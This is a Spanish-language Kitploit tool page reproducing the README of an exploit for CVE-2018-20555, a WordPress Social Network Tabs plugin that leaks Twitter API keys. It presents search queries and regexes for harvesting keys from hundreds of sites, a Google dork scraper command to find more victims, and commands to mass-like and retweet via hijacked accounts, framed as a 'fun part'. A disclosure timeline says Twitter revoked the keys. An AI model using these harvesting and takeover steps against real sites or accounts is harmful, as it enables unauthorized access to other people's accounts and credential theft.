Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2018-20555 — Exploit para CVE-2018-20555: descubrimiento automatizado y toma de control de cuentas de Twitter mediante claves de API filtradas en el plugin vulnerable Social Network Tabs de WordPress, con capacidades de scraping y explotación masiva. | Kitploit
Herramientas/GitHubGitHub/fs0c131y/cve-2018-20555
OSINT (Inteligencia de Fuentes Abiertas)Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónCrawler
GitHubfs0c131y/cve-2018-20555

CVE-2018-20555

Exploit para CVE-2018-20555: descubrimiento automatizado y toma de control de cuentas de Twitter mediante claves de API filtradas en el plugin vulnerable Social Network Tabs de WordPress, con capacidades de scraping y explotación masiva.

Ver Repositorio
71182hace 7 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Sitio web

CVE-2018-20555

El plugin de WordPress llamado Social Network Tabs, creado por la empresa Design Chemical, está filtrando dos veces el access_token, access_token_secret, consumer_key y consumer_secret de Twitter de sus usuarios, lo que conduce a una toma de control de su cuenta de Twitter.

Esto es causado por las siguientes líneas de código dentro de la página donde se muestra el widget de Twitter:

root@kitploit:~
jQuery(document).ready(function ($) {
	var config = {
		widgets: "twitter,facebook,youtube",
		twitterId: "[redacted]",
		facebookId: "[redacted]",
		youtubeId: "[redacted]",
		twitter: {
			url: "https://www.rainx.com/wp-content/plugins/social-network-tabs/inc/dcwp_twitter.php?1=%5Breadcted%5D&2=%5Bredacted%5D&3=%5Bredacted%5D&4=%5Bredacted%5D …",
			title: "Latest Tweets",
			follow: "Follow",
			followId: "",
			limit: "10",
			retweets: true,
			replies: true,
			images: "thumb",
			consumer_key: "[redacted]",
			consumer_secret: "[redacted]",
			access_token: "[redacted]",
			access_token_secret: "[redacted]"
		},
	}
});

Explotación

Gracias a Publicwww, con las siguientes consultas de búsqueda, logré recuperar el access_token, access_token_secret, consumer_key y consumer_secret de Twitter de 539 sitios web vulnerables:

  • dcwp_twitter.php access_token_secret snipexp:|access_token: "([\w\d-._]+)"|
  • dcwp_twitter.php access_token_secret snipexp:|access_token_secret: "([\w\d-._]+)"|
  • dcwp_twitter.php access_token_secret snipexp:|consumer_key: "([\w\d-._]+)"|
  • dcwp_twitter.php access_token_secret snipexp:|consumer_secret: "([\w\d-._]+)"|

Todas las claves están disponibles en twitter_keys.csv.

Cómo usar

Probar las claves de la API de Twitter en twitter_keys.csv

root@kitploit:~
python test_twitter_api_keys.py -t

La primera vez que ejecuté este comando, obtuve la información de 446 cuentas de Twitter. Vale la pena mencionar que había 2 cuentas verificadas en la lista y múltiples cuentas con más de 10K+ seguidores. Todas las cuentas vulnerables están en vulnerable_accounts.txt.

Parte divertida

Dar like al tweet de tu elección

root@kitploit:~
python test_twitter_api_keys.py -l [tweet_id]

Retuitear el tweet de tu elección

root@kitploit:~
python test_twitter_api_keys.py -r [tweet_id]

La primera vez que ejecuté este comando, logré dar like al tweet de mi elección 127 veces, lo que demostró que 127 claves de la API de Twitter tenían permisos de lectura y escritura, es decir, pude tomar el control de 127 cuentas de Twitter (cambiar foto de perfil, dar like, retuitear, cambiar biografía, etc.) debido a esta filtración de claves.

ACTUALIZACIÓN 17/01/18

Muchos sitios web y, por lo tanto, cuentas de Twitter todavía son vulnerables a este problema. Para identificarlos, creé un scraper

root@kitploit:~
cd TwitterApiKeysSearchEngine/

scrapy crawl TwitterApiKeysSpider -a keyword="inurl:/inc/dcwp_twitter.php?1=" -a se=google -a pages=10

El total de resultados para esta consulta de búsqueda en Google es 3550. Entre las primeras 9 páginas, logré recuperar 78 claves (86%). ¡Disfruta!

Divulgación

  • 01/12/18: Divulgación a Twitter
  • 0X/12/18: Twitter desactivó todas las claves
  • 11/12/18: Reconocimiento como un problema de seguridad válido por parte de Twitter

Contacto

¡Sígueme en Twitter! También puedes encontrar una pequeña parte de mi trabajo en https://fs0c131y.com

Créditos

La investigación y el POC se realizaron con ❤️ por @fs0c131y

Descargar herramienta